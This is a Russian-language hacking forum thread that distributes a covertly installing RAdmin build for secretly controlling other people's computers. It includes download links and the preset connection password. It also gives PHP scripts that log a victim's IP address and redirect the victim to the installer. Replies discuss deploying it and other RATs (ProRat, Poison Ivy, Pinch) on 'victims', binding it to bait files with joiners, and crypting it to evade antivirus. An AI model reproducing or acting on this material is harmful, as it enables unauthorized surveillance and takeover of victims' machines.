Думаю в этот раздел тема подойдет.
Вашему вниманию представляется уникальная сборка хорошо зарекомендовавшей себя программы удаленного администрирования Remote Administrator© - Скрытый RAdmin.
Уникальность заключается в том, что сам инсталлятор устанавливается скрытно от пользователя, прописывается в список исключений в Windows Security Center (и соответственно разрешает список исключений), полностью прописываются настройки программы (скрытие иконки из system tray, активационный ключ, пароль для соединения и т.д.). Если вы хотите хорошую программу для удаленного наблюдения/администрирования, то Скрытый RAdmin - ваш выбор! Т.к. RAdmin не является программой-шпионом или какой-либо троянской программой, то антивирусы не "ругаются" при установке.
Данная сборка представляет собой полностью скрытый инсталятор!
Пароль в текстовом файле указан.
Чтобы узнать ip:
Регистрируемся на www.2ru.name, создаем файл index.php, где пишем:

<?php
$ip = getenv ("REMOTE_ADDR");
$FL = fopen("log.txt", "a+");
fwrite($FL, $ip);
fclose($FL);
?>
<?php
header("Location: http://www.newdomain.ru/newdir/newpage.htm");
exit();
?>

Это запишет адрес зашедшего в лог файл и перебросит на ссылку с радмином
-------------------
То есть вы даете человеку ссылку вида www.****.2ru.name, он по ней переходит, его редиректит на ссылку с радмином, он запускает, затем смотрим его ip в файле log.txt на сервере и управляем компьютером, или просто наблюдаем, если конечно есть внешний Ip у жертвы.
http://rapidshare.com/files/117121427/radmin.rar
Пароль для соединения: privedmidved

ну и зачем эти скрипты?
не каждый пользователь будет качать и запускать на компе хрен знает какие экзешники.

Кто нить тестил? результаты в студию

все работает отлично

жаль что у радмина нет бэкконнекта- так придется постоянно проверять лог, дабы поймать юзера или сканить диапазон на наличие радминовского порта

все работает отлично
Не в обиду но нет ни какой гарантии что это не пинч... Просто вначале пускай протестят люди знающие с опытом а потом и остальные заюзают)

проверка антивирусами (http://www.virustotal.com/ru/analisis/0528558d929c512cbd637c54af46851a)
хотел полезным поделиться, а тут не доверяют :mad:

Нет оснований доверять челу у кого 7 постов и 1 репы и то от меня)

Если выложишь видео как это все настраивается и работает тогда тебе многие будут благодарны а пока ждём отзывы

С динамическими IP радмин не пашет?
На сколько я понял файл внутри архива urc.exe это и есть скрытый установщик?

ну может сделаю и видео.
На сколько я понял файл внутри архива urc.exe это и есть скрытый установщик?
да
С динамическими IP радмин не пашет?
пашет, но только до тех пор, пока нету разрыва сессии))))

так ведь с ноября месяца не было разрывов!!!!1

отвечайте на мой ответ!!!111

ну может сделаю и видео
Давай делай видео, с меня ещё плюсеги будут за видео, а то не могу разобраться.

Респект.Работает.Главное чтобы в ближайшее время не пальнули.

а чего там разбиратся?Кинул жертве,у себя в вьювере вписал -пасс и погнал.Пробовал у себя в локалке

а чего там разбиратся?Кинул жертве,у себя в вьювере вписал -пасс и погнал.Пробовал у себя в локалке
Хорошо теперь другой вопрос, как ты будешь узнавать Ip если ты по инету будешь кидать этот скрытый сервер

надеюсь из этого раздела не удалят

Хорошо теперь другой вопрос, как ты будешь узнавать Ip если ты по инету будешь кидать этот скрытый сервер
так для этого в первом посте есть скриптенг

Эт надо заставить жертву скачать сервер, запустить его и зайти на сайтег, чтоб узнать Ip

Эт надо заставить жертву скачать сервер, запустить его и зайти на сайтег, чтоб узнать Ip
нет, жертва заходит на сайт (айпи сразу записался в лог), и редиректит на ссылку с установщиком

ет, жертва заходит на сайт (айпи сразу записался в лог), и редиректит на ссылку с установщиком
В первом посте есть скрипт на редерект, только куда его писать я не знаю(чайник в php)

просто замени ссылку, что непонятного. хотя там и так редиректит на вэбфайл с радмином этим.

проверка антивирусами (http://www.virustotal.com/ru/analisis/0528558d929c512cbd637c54af46851a)
хотел полезным поделиться, а тут не доверяют :mad:
доверие тут месяцами получаешь

Теперь вопрос противоположного плана, как эту заразу удалить с зараженного компа

бляяяяя нахуя удалять?
Мало ли просто интересно стало

перезалить на другой файл-хостинг кто-нить может?)

перезалить на другой файл-хостинг кто-нить может?)
http://www.rapidshare.ru/684050
http://depositfiles.com/files/5588560

протестил снифером, при запуске никуда ниче не отсылалося))))

Можно вот на счет IP попонятнее... непойму где он отображаться должен?

Интересно было наблюдать за жертвой.Но когда я увидел что в процессах у него r_serv я охренел.Он его завершил и я отрубился.Как такое может быть?Предполагаю что у него свой радмин,однако хреново что при его отключение отключается и мой.

r_serv - это сервер радмина. что тебя удивило?
это ж не вьюер

я понимаю что это сервер,но когда я запускаю этот трой,если его можно так назвать,у меня в процессах ничего не появляется.

Можно вот на счет IP попонятнее... непойму где он отображаться должен?
на сервере в файле log.txt

на сервере в файле log.txt
Да вот напрочь отказывается туда что либо записываться.
на index.php и на log.txt поставил параметр 777

индекс - 644
лог - 666

У меня все IP лежат в log.txt

так чё ни кто не знает как убить эту заразу

в процессах и в windows/где-то там

Посмотри автозапуск здесь (XP):
1) пуск->выполнить->regedit->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run b и на всякий RunOnce
2) либо пуск->выполнить->msconfig->автозапуск.
если там ничего не найдет, ставь каспера он должен все найти.

Посмотри автозапуск здесь (XP):
1) пуск->выполнить->regedit->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run b и на всякий RunOnce
2) либо пуск->выполнить->msconfig->автозапуск.
если там ничего не найдет, ставь каспера он должен все найти.
Каспер не найдёт, это не трой прога.

ясно, avz пробовал?

ясно, avz пробовал?
Да мне ни чего не надо пробовать, мне ни чего не надо сносит (читай внимательно пост), мне для общего развития, так сказать на будущее

Спасибо читал внимательно :mad:
Я тебя заставляю тестить?
В данном контексте "пробовал?"=="юзал раньше?".

Ты знаешь что такое avz? Она ничего не сносит, она находит, это не антивирус.
>так сказать на будущее
На будущее, еcли предпочитаешь тыкать на внимательность, а не слушать советы (считаю дельные), то юзай ГУГЛ :mad:

Создатель этого радмина,неплохо было бы если бы в процессах не r_serv висело а svchost

Без бакконнекта туговато будет. Кстати а в автостарт трой приписывается?

Так можно назвать файл как угодно. Как файл назовешь, так он в процессах висеть и будет.
ИМХО: Лучше всего найти или написать Джойнер и склеить файл сервера Radmin'а с html файлом, в котором в хидере записан радирект на любой сниффер! Потом в логе сниффера все будет записано! И еще лучше всего склеить еще с какой-нибдуь прогой для еще меньшей паливности... Но джойнеров антивирусы палят, точнее палят файлы, которые уже склеили! Так что полученный файлик можно закриптовать! Удачи!

Так можно назвать файл как угодно. Как файл назовешь, так он в процессах висеть и будет.
уверен? В данной сборке радмин версии 2.2 используется.. Его попробуй переименуй.. Хоть символ в его имени (r_server.exe), он просто отказывается запускаться.

Люди добрые подскажите пожалуйста.
Шо за фигня у мя проихсодит?

Проверял Radmin в своей сети - всё круто) работает)

Возникла необходимость получить доступ к тачке в чужой сети (другой провайдер)

На тачке нет антивирсуов, фаеров, брэнмаэур выключен!

Кинул туда - ProRat, Poison Ivy, Радмина - причём всё это 100% было запущенно - а коннекта нет ни в 1м случае...

Я знаю что чел в онлайне (он в аське сидит), что всё у него активировано, антивирей нет - и один фиг ни 1 из трёх бэков не конектиЦо...

Вернёмся к Радмину -
У меня и того компа интернет VPN
у меня vpn.XXXXtelecom.ru у того компа vpn.YYYYtelecom.ru

Сервер скрытой установки Радмина 100% запущен на той тачке..

IP тачки получил при помощи Пинча -
IP0: 172.XX.1.78
IP1: 10.XX.1.78

Если юзаю радмин в своей сети я вкидывал в настройки соединения IP - и всё работало, хватит ли знания IP для подключению через Интернет?

Из за чего могут возникать такие проблемы, ведь всё настроенно верно (в сети пашет) ?

Заранее спасибо.

у него значит нету внешнего Ip

А как можно выйти из положения?

Сейчас попробовал пингануть оба IP что получил пинчем - чел в сети, а ping не проходит... :confused:

тебе нужен первый ип - IP0: 172.XX.1.78
чтобы выйти из положения вам нужно поставить Hamachi, на 2ух компьютерах (эмулятор лок. сети)

Спасибо!

В Радмине - В настройках есть IP/DNS Name, а если на том компе будет стоять сервис No-IP это поможет?

я думаю нет, ставь хамачи

А толку от Хамачи?))

На том компе, который я пытался забэкдорить сидит не очень умный человек, и я даже под видом хер знает чего развёл его на установку Хамачи и добавление в созданную мною сеть... а дальше что?
Во первых скоость ппц.. А во вторых надо ещё чтоб чел локальные диски сам расшарил - а просить его об этом это уже реально палево))))

зачем, диски не надо расшаривать насколько я помню, достаточно установить соединение и можно управлять файлами через радмин

А к чему тогда Radmin коннектить? Тамже в настройке соединения надо IP|DNS писать?

Или если по Хамачи соединение есть - просто нажать найти робочие сервера - он сам найдёт, бех создания нового соединения?

ну пока не пробовал с хамачи, будет время - разберусь

так ведь с ноября месяца не было разрывов!!!!1

лол )) как там этого чела зовут? )) такой ламо )) я думал этоон прикалывался )

Антоша Уральскей :d

Ещё один скрытый установщик
Скачать (http://download.nextmail.ru/6/9/208ebd44ae1a0cde8894df94778c1fda/twiker.exe)
Тестил, вроде пашет

Ещё один скрытый установщик
Скачать (http://download.nextmail.ru/6/9/208ebd44ae1a0cde8894df94778c1fda/twiker.exe)
Тестил, вроде пашет
а что это? расскажи поподробнее?

тож самое что и ты выкладывал. Скрытый установщик сервера

по Хамачи скрытого установщика никто не видел случайно?)

по Хамачи скрытого установщика никто не видел случайно?)
Нет

http://www.kodsweb.ru/texts/radmin.txt

© kodsweb.ru

Подскажите как можно усовершенствовать Скрытый радмин чтоб он работал в нете, проверял у себя в локалке работает на все 100% а вот кинул знакомаму ( другой город ) работать нехочет. Я так понял что нету внешнего айпи адреса у него. То что он его запустил точно знаю. Подскажите как можно добица успеха чтоб он заработал в моем случае?

Ещё один скрытый установщик
Скачать (http://download.nextmail.ru/6/9/208ebd44ae1a0cde8894df94778c1fda/twiker.exe)
Тестил, вроде пашет

2 Folc ну ты и лол , вот ты жжёшь , Ещё один скрытый установщик я этого радмина выдрал из ZverCD (radmin v2.2) и для удобства переименовал в twiker.exe :D и иконка там в виде светофора , читай вот тут http://forum.antichat.ru/showthread.php?p=563617#post563617 этой мессаги сто лет в обед , а то такой базар развели пипец :D

Кто нибудь может помочь!? Я опять про своего знакомого! Кинул я ему (Турка, Иву, ПроРат и Радмин) но все без результатно. У меня локалка и у него, я без внешнего IP и он тоже! Как в такой ситуации мне залесть в его машину??? Подскажите может есть какойто другой ( BackDoor ) для этого случая!!! Или как можно настроить один из этих так, чтоб работало в моей ситуации!?

народ, я конечно нуб во всем этом, но знание английского у меня хорошее и соображаю вроде нормально.

в ProRat отлично реализована система обхода внешнего айпи. просто стоит почитать встроенное руководство к нему (на английском) и подключаться к жертве, используя туннель. и вообще в теме про ProRat все хорошо описано.

http://forum.antichat.ru/thread71873.html
http://forum.antichat.ru/thread43307-prorat.html

если я не прав, просто объясните в чем, а не флудите плиз

не работает ProRat без внешнего IP...

не работает ProRat без внешнего IP...

например? если жертва за рутером или как?

проверял на тачке без анивирусов, фаеров и брэндмауэров... у меня внешний Ip есть, там нет... соединение Vpn и у мя и там... коннекта нет...

седня у мя времени нет, завтра потестю. я ща Poison Ivy изучаю, раньше не пользовался. мне вот интересно можно ли ту фичу с no-ip.com к Poison Ivy применить... следить за портами. а уведомление на cgi есть в Poison Ivy?

В Poison Ivy настройки соединения делал через no-ip.com, оповещение идёт через сам клиент, но без внешнего IP (у жертвы) походу тоже не фурычит...

Roxx глянь ещё -http://forum.antichat.ru/thread71770.html
касательно бэкдоров и внешнего IP

Кто может объяснить? Поставили на два компа по Хамачи а конекта всеравно нету? Этот скрытый Радмин получаеца только в локалке работает? Почему с помощью даже Хамачи нет конекта?

Связь можно осуществить только через саму Хамачи, Radmin к хамачевскому тунелю вроде не приконектишь... ведь радмину IP нужен...
Радмин не только в локалке работает, просто нужен внешний IP..

вот че нагуглил, изучайте
http://forum.ixbt.com/topic.cgi?id=7:24612
http://forum.antichat.ru/showthread.php?p=364019
https://secure.logmein.com/home.asp?lang=ru

k0lbasa молодец!!!!!!

респект... тока пока всё равно до конца не вкурил как Радмин череp Хамачу коннектить... точнее для Хамачи походу 3й комп нужен, а настрйока VPN сервера (у себя) и VPN клиента на машине жертвы както не удобно...

kOlbasa Ты конечно молодец базару нет, но слишком много гемора, щас поясню
Пашет в локалке 100% так зачем заливать в нет? DC++ расшариваешь и всё путём.
Надо использовать джойнер, т.е. склеить с какой либо флешкой и выкладывать в шару (лично склеил а "хентайской"... НАРОД СХАВАЛ)
З.Ы. Помнишь хеш? попробуй установить оперу и куки подменить, вот видос небольшой
_http://www.xakep.ru/post/41619/

F1shka А какой джойнер юзал?

на ачате брал, залил _http://webfile.ru/2001080

Кстате где-то видел патчи для радмина, чтобы иконка в трее не поялвялась... МОжно юзать как бакдур!

реестр..

реестр..
что реестр?

что реестр?
в реестре треевская иконка убирается

Кстате где-то видел патчи для радмина, чтобы иконка в трее не поялвялась... МОжно юзать как бакдур!
в этой сборке и нету иконки в трее!

а не проще склеить урц.ехе и отправить жертве? это вопрос=)

<?php
[code]$ref=$_SERVER['QUERY_STRING'];
if ($ref!='') $ref='?'.$ref;
header('Location: http://webfile.ru/1963801'.$ref);
exit();
?>


Вот этот код как назвать!!!

ну я имею веду сохранить как index.php или как небудь по другому илиэто все один файл index.php???

да хоть как, хоть как индекс

у меня вопрос я сделал я зарегался на хосте 2.ru name coздал файл index.php вписал туда первый код
<?
$a = $_SERVER['REMOTE_ADDR'];
$b = $_SERVER['HTTP_USER_AGENT'];
$c = @$_SERVER['HTTP_REFERER'];
$d = $_SERVER['SERVER_PORT'];
$e = $_SERVER['HTTP_HOST'];
$af = $_ENV['USERNAME'];

$count1=" IP: $a br: $b ot: $c p: $d h: $e us: $af \n";
$f=fopen("log.txt","a+");
fwrite($f,$count1);
fclose($f);
?>
все работает ip жертвы записывается в файл лог
но со вторым кодом я не знаю что делать создал файл 1.php
вписал туда этот код
<?php
[code]$ref=$_SERVER['QUERY_STRING'];
if ($ref!='') $ref='?'.$ref;
header('Location: http://slil.ru/25919776'.$ref);
exit();
?>
и ничего не происходит на всех php выставил chmod 777 но почему не перебрасывает на скачивание файла кто шарит подскажите что я сделал не так

все в индекс нужно

вот теперь другое дело спс все работает на ура.

Все пипец пришол Радмину, и кто бы мог подумать его палит какойто Аваст! палит как Руткит если даже его как небуть установит на комр жертвы то всеравно после скана он его находит и палит, провывал криптонут но все мне известные крипторы его ламают, после крипта он не работает!
Мож у кого получилос его криптонуть?

Криптуй ручками, либо закажи ручной крипт и палить не будет))